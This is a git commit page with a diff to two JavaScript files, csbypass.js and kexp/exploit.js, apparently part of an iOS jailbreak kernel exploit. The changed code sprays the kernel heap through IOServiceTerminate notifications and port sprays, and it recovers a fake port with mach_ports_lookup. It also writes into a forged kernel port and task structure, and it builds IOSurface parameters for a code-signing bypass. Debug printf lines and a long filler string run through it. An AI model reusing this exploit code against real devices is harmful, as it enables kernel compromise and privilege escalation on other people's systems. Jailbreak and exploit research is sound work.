AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

author: spv420 <spv@spv.sh> 2022-07-29 12:21:35 -0400
committer: spv420 <spv@spv.sh> 2022-07-29 12:21:35 -0400
commit: 5ffc1a10b206f367c135330405833d7c59de56cb (patch)
tree: dfdb6f62049d6c1ef1150ed35f1efe211f442305
parent: 66d18219be2629aa1c31c180d94f49b62812802a (diff)
2 files changed, 37 insertions, 55 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index 3065099..12388a0 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -25,27 +25,23 @@ function memcpy_exec(dst, src, size) {
 	var width = malloc(4);
 	var height = malloc(4);
 	var pitch = malloc(4);
-	var pixel_format = malloc(5);
+	var pixel_format = malloc(8);
 	write_u32(width, PAGE_SIZE / (16 * 4));
 	write_u32(height, 16);
 	write_u32(pitch, read_u32(width) * 4);
 	write_u32(pixel_format, 0x42475241); // ARGB
 	write_u32(pixel_format + 4, 0x0); // ARGB
 	printf("%x %x\n", CFDictionarySetValue_addr + get_dyld_shc_slide(), dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue"));
-	dict = callnarg(CFDictionaryCreateMutable_addr + get_dyld_shc_slide(), 0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
+	dict = CFDictionaryCreateMutable(0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
 	printf("dict: %p\n", dict);
-	var test = callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pitch);
+	var test = CFNumberCreate(0, kCFNumberSInt32Type, pitch);
 	printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
 	scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
 	callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
-	call4arg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
-	printf("fuck1\n");
-	callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
-	printf("fuck2\n");
-	callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceHeight), read_u32(my_kIOSurfaceHeight + 4), read_u32(my_kIOSurfaceHeight + 8), read_u32(my_kIOSurfaceHeight + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height));
-	printf("fuck3\n");
-	callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfacePixelFormat), read_u32(my_kIOSurfacePixelFormat + 4), read_u32(my_kIOSurfacePixelFormat + 8), read_u32(my_kIOSurfacePixelFormat + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format));
-	printf("fuck4\n");
+	CFDictionarySetValue(dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
+	CFDictionarySetValue(dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
+	CFDictionarySetValue(dict, read_u32(my_kIOSurfaceHeight), read_u32(my_kIOSurfaceHeight + 4), read_u32(my_kIOSurfaceHeight + 8), read_u32(my_kIOSurfaceHeight + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height));
+	CFDictionarySetValue(dict, read_u32(my_kIOSurfacePixelFormat), read_u32(my_kIOSurfacePixelFormat + 4), read_u32(my_kIOSurfacePixelFormat + 8), read_u32(my_kIOSurfacePixelFormat + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format));
 	printf("fuck you\n");
 	printf("%d\n", callnarg(my_IOSurfaceAcceleratorCreate, 0, 0, accel));
 }
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 419f5c7..e854ba0 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -185,13 +185,18 @@ function spray(dict, size, port) {
 	var ret = 0;
 	var master = shit_heap(4);
 
-	host_get_io_master(mach_host_self(), master);
-	io_service_add_notification_ool(master, "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+	ret = host_get_io_master(mach_host_self(), master);
+	printf("yahtzee3 %d (%s) %p\n", ret, mach_error_string(ret), read_u32(master));
+//	scall("printf", "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141);
+	ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+	printf("yahtzee %d (%s)\n", ret, mach_error_string(ret));
 
 	if (ret == KERN_SUCCESS) {
 		ret = read_u32(err);
 	}
 
+	printf("yahtzee2 %d (%s)\n", ret, mach_error_string(ret));
+
 	return ret;
 }
 
@@ -370,36 +375,6 @@ function mach_ports_lookup_shit() {
 //	return 0x42603;
 }
 
-function mach_ports_lookup_shit_dealloc() {
-	printf("fuck\n");
-	var arrz = shit_heap(4);
-	printf("fuck\n");
-	write_u32(arrz, 0);
-	printf("fuck\n");
-	var sz = shit_heap(4);;
-	printf("fuck\n");
-	write_u32(sz, 3);
-	printf("fuck\n");
-//	var mts = mach_task_self();
-	printf("fuck\n");
-	calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
-	puts("helo");
-	printf("mpl success\n");
-	scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
-	printf("mpl success\n");
-
-	for (var i = 0; i < read_u32(sz); i++) {
-		if (read_u32(read_u32(arrz) + (i << 2)) != 0) {
-			printf("destroying %p\n", read_u32(read_u32(arrz) + (i << 2)));
-			mach_port_destroy(mach_task_self(), read_u32(read_u32(arrz) + (i << 2)));
-			printf("destroyed %p\n", read_u32(read_u32(arrz) + (i << 2)));
-		}
-	}
-
-	return read_u32(read_u32(arrz) + 8);
-//	return 0x42603;
-}
-
 var kernel_task_addr = 0;
 function get_kernel_task() {
 	var ret = 0;
@@ -469,18 +444,20 @@ again: while (true) {
 	sched_yield();
 	var dummy = shit_heap(4);
 	for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
-		spray(big_buf, big_size, dummy);
+		var dummy = shit_heap(4);
+		spray(big_buf, read_u32(big_size), dummy);
 	}
 
 	sched_yield();
 	var dummy = shit_heap(4);
 	for (var i = 0; i < PORTS_NUM; i++) {
 //	for (var i = 0; i < 8; i++) {
+		var dummy = shit_heap(4);
 		if (i % 4 == 0) {
 			printf("spray_ports %d\n", i);
 		}
 		write_u32(fp + (i << 2), spray_ports(1));
-		spray(small_buf, small_size, dummy);
+		spray(small_buf, read_u32(small_size), dummy);
 	}
 
 	sched_yield();
@@ -489,15 +466,23 @@ again: while (true) {
 		release_port_ptrs(read_u32(fp + (i << 2)));
 	}
 
+//	return;
+
+
+	var arrz = shit_heap(16);
+	write_u32(arrz, 0);
+	write_u32(arrz + 4, 0);
+	write_u32(arrz + 8, 0);
+	write_u32(arrz + 12, 0);
+	var sz = shit_heap(4);
+	write_u32(sz, 3);
+//	mach_ports_lookup_shit_dealloc();
+	var ret__ = r3gister(mach_task_self(), arrz, 2, 3);
+	mach_ports_lookup(mach_task_self(), arrz, sz);
+	scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+	printf("mpl success\n");
 
-	var arrmpt = shit_heap(16);
-	write_u32(arrmpt, 0);
-	write_u32(arrmpt + 4, 0);
-	write_u32(arrmpt + 8, 0);
-	write_u32(arrmpt + 12, 0);
-	mach_ports_lookup_shit_dealloc();
-	var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
-	mach_ports_lookup_shit();
+	var fake_port = read_u32(read_u32(arrz) + 8);
 	printf("%d %s\n", ret__, mach_error_string(ret__));
 	printf("r3gister done\n");
 //	while (true) {
@@ -509,7 +494,7 @@ again: while (true) {
 	/*
 	 *  BEGIN JANK FUCKING HACK
 	 */
-	var fake_port = mach_ports_lookup_shit();
+//	var fake_port = mach_ports_lookup_shit();
 	printf("fuck\n");
 	printf("%x\n", fake_port);
 	printf("fuck\n");
@@ -519,7 +504,8 @@ again: while (true) {
 	printf("fuck\n");
 	write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
 	printf("fuck\n");
-	write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+//	write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+	write_u32(ptr, 0x73707621);
 	printf("fuck\n");
 	var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
 	printf("fuck\n");
author	spv420 <spv@spv.sh>	2022-07-29 12:21:35 -0400
committer	spv420 <spv@spv.sh>	2022-07-29 12:21:35 -0400
commit	5ffc1a10b206f367c135330405833d7c59de56cb (patch)
tree	dfdb6f62049d6c1ef1150ed35f1efe211f442305
parent	66d18219be2629aa1c31c180d94f49b62812802a (diff)